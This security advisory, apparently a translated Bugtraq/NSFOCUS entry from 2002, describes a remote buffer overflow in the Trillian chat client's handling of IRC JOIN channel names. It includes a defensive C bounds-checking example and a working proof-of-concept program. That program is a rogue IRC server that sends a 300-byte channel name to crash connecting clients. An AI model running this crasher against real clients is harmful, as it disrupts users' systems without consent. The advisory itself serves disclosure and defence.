Security Vulnerability
Trillian IRC JOIN Remote Buffer Overflow Vulnerability

Published: 2002-09-20
Updated: 2002-09-25

Affected systems:
Cerulean Studios Trillian 0.74
Cerulean Studios Trillian 0.73

Description:
BUGTRAQ ID: 5765

Cerulean Studios Trillian is a chat client that provides a single interface to several instant-messaging networks, including AIM, ICQ, Yahoo! Messenger, MSN Messenger and IRC.

Trillian mishandles the channel name carried in the IRC 'JOIN' command. A remote attacker may be able to exploit this flaw to execute arbitrary code on the system with the privileges of the Trillian user.

When Trillian processes a 'JOIN' command for a channel, it does not properly bounds-check the channel name. A remote IRC server that supplies a channel name longer than 206 bytes can crash the client and corrupt memory; a carefully constructed channel name may allow arbitrary code to be executed with the privileges of the Trillian user.

<*Source: Lance Fitz-Herbert (fitzies@hotmail.com)

  Link: http://marc.theaimsgroup.com/?l=bugtraq&m=103254430206198&w=2
*>
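The check the advisory describes as missing, written here as an added example (it is not code from the advisory, from Cerulean Studios or from the original poster): a client-side routine that extracts the channel name from an IRC server line of the form ":nick!ident@host JOIN :#channel" and compares its length against the destination buffer before any byte is copied. The 50-character limit is the maximum channel-name length from RFC 2812 and is this example's own choice of bound; the prefix, nick and channel names in the driver are constructed sample data.

```c
#include <stdio.h>
#include <string.h>

/* Upper bound on the channel name accepted from the server. RFC 2812 caps
 * channel names at 50 characters; any fixed limit works as long as it is
 * enforced before the copy (the value here is this example's choice). */
#define MAX_CHANNEL_LEN 50

/* Result codes returned by parse_join_channel(). */
enum join_result {
    JOIN_OK = 0,
    JOIN_NOT_JOIN = -1,      /* line is not a JOIN message */
    JOIN_MISSING_NAME = -2,  /* JOIN with no channel parameter */
    JOIN_NAME_TOO_LONG = -3  /* name does not fit: rejected, never truncated or copied */
};

/* Extract the channel name from ":prefix JOIN :#channel" into out[outsz].
 * The length is checked against outsz BEFORE anything is written, which is
 * the bounds check the advisory says the client lacked. */
static int parse_join_channel(const char *line, char *out, size_t outsz)
{
    const char *p = line;
    const char *name;
    size_t len;

    if (outsz == 0)
        return JOIN_NAME_TOO_LONG;
    out[0] = '\0';

    /* Skip the optional ":prefix " (message source). */
    if (*p == ':') {
        p = strchr(p, ' ');
        if (p == NULL)
            return JOIN_NOT_JOIN;
        while (*p == ' ')
            p++;
    }

    /* Command must be exactly "JOIN" followed by a space. */
    if (strncmp(p, "JOIN", 4) != 0 || p[4] != ' ')
        return JOIN_NOT_JOIN;
    p += 4;
    while (*p == ' ')
        p++;

    /* A leading ':' marks the trailing parameter; strip it. */
    if (*p == ':')
        p++;

    /* The name ends at whitespace or end of line (JOIN may carry a key). */
    name = p;
    len = strcspn(name, " \r\n");
    if (len == 0)
        return JOIN_MISSING_NAME;

    /* The bounds check: refuse anything that does not fit with its NUL. */
    if (len >= outsz)
        return JOIN_NAME_TOO_LONG;

    memcpy(out, name, len);
    out[len] = '\0';
    return JOIN_OK;
}

/* Convenience wrapper: parse into a MAX_CHANNEL_LEN buffer, return only the code. */
static int classify_join(const char *line)
{
    char channel[MAX_CHANNEL_LEN + 1];
    return parse_join_channel(line, channel, sizeof channel);
}

/* Runs a benign JOIN and a 300-byte one (both constructed) through the parser.
 * Returns 1 when the benign name is accepted and the oversized one is rejected
 * with the destination left empty, 0 otherwise. */
static int run_demo(void)
{
    static const char prefix[] = ":target!ident@address JOIN :";
    const size_t plen = sizeof prefix - 1;
    char channel[MAX_CHANNEL_LEN + 1];
    char oversized[400];
    int rc_ok, rc_long;

    rc_ok = parse_join_channel(":target!ident@address JOIN :#korp", channel, sizeof channel);
    printf("benign:    rc=%d channel=%s\n", rc_ok, channel);
    if (rc_ok != JOIN_OK || strcmp(channel, "#korp") != 0)
        return 0;

    /* Constructed line whose channel name is 300 'A' bytes, as in the advisory. */
    memcpy(oversized, prefix, plen);
    memset(oversized + plen, 'A', 300);
    oversized[plen + 300] = '\0';
    rc_long = parse_join_channel(oversized, channel, sizeof channel);
    printf("oversized: rc=%d channel=\"%s\"\n", rc_long, channel);
    return rc_long == JOIN_NAME_TOO_LONG && channel[0] == '\0';
}

int main(void)
{
    return run_demo() ? 0 : 1;
}
```

Fed the same 300-byte channel name that the test program below sends, parse_join_channel() returns JOIN_NAME_TOO_LONG and leaves the destination buffer empty instead of writing past its end; rejecting the message outright, rather than silently truncating it, also keeps a hostile server from steering which bytes land in the buffer.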

Test method:

Warning

The following program (method) may be offensive in nature and is provided solely for security research and teaching. Users bear the risk themselves!

Lance Fitz-Herbert (fitzies@hotmail.com) provided the following test program:

/* Trillian-Join.c
   Author: Lance Fitz-Herbert
   Contact: IRC: Phrizer, DALnet - #KORP
            ICQ: 23549284

   Exploits the Trillian Join Flaw.
   Tested On Version .74 and .73
   Compiles with Borland 5.5 Commandline Tools.

   This Example Will Just DoS The Trillian Client,
   not particularly useful, just proves the flaw exists.

*/

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* strlen, memset */
#include <winsock.h>

SOCKET s;

/* Fake registration reply (numeric 001) followed by the start of a JOIN
   message; the oversized channel name is appended after the trailing ':'. */
#define MSG1 ":server 001 target :target\n:target!ident@address JOIN :"

int main() {

    SOCKET TempSock = SOCKET_ERROR;
    WSADATA WsaDat;
    SOCKADDR_IN Sockaddr;
    int nRet;
    char payload[300];

    printf("\nTrillian Join Flaw\n");
    printf("----------------------\n");
    printf("Coded By Lance Fitz-Herbert (Phrizer, DALnet/#KORP)\n");
    printf("Tested On Version .74 and .73\nListening On Port 6667 For Connections\n\n");

    if (WSAStartup(MAKEWORD(1, 1), &WsaDat) != 0) {
        printf("ERROR: WSA Initialization failed.");
        return 0;
    }

    /* Create Socket */
    s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (s == INVALID_SOCKET) {
        printf("ERROR: Could Not Create Socket. Exiting\n");
        WSACleanup();
        return 0;
    }

    /* Listen on the standard IRC port on all interfaces */
    Sockaddr.sin_port = htons(6667);
    Sockaddr.sin_family = AF_INET;
    Sockaddr.sin_addr.s_addr  = INADDR_ANY;

    nRet = bind(s, (LPSOCKADDR)&Sockaddr, sizeof(struct sockaddr));
    if (nRet == SOCKET_ERROR) {
        printf("ERROR Binding Socket");
        WSACleanup();
        return 0;
    }

    /* Make Socket Listen */
    if (listen(s, 10) == SOCKET_ERROR) {
        printf("ERROR: Couldnt Make Listening Socket\n");
        WSACleanup();
        return 0;
    }

    /* Wait for the client to connect */
    while (TempSock == SOCKET_ERROR) {
        TempSock = accept(s, NULL, NULL);
    }

    printf("Client Connected, Sending Payload\n");

    send(TempSock, MSG1, strlen(MSG1), 0);
    /* 300 bytes of 'A' as the channel name. payload carries no terminating
       NUL, so its length is sizeof(payload), not strlen(payload). */
    memset(payload, 'A', sizeof(payload));
    send(TempSock, payload, sizeof(payload), 0);
    send(TempSock, "\n", 1, 0);

    printf("Exiting\n");
    Sleep(100);   /* Win32 Sleep(), in milliseconds */
    WSACleanup();
    return 0;
}

Recommendations:
Temporary workaround:

If you cannot install a patch or upgrade immediately, NSFOCUS recommends the following measures to reduce the threat:

* Do not use Trillian for IRC chat for the time being.

Vendor patch:

Cerulean Studios
----------------
The vendor has not yet released a patch or upgrade. We recommend that users of this software watch the vendor's homepage for the latest version:

http://www.ceruleanstudios.com/

This vulnerability advisory was translated and compiled by NSFOCUS (绿盟科技). All rights reserved; reproduction without permission is prohibited.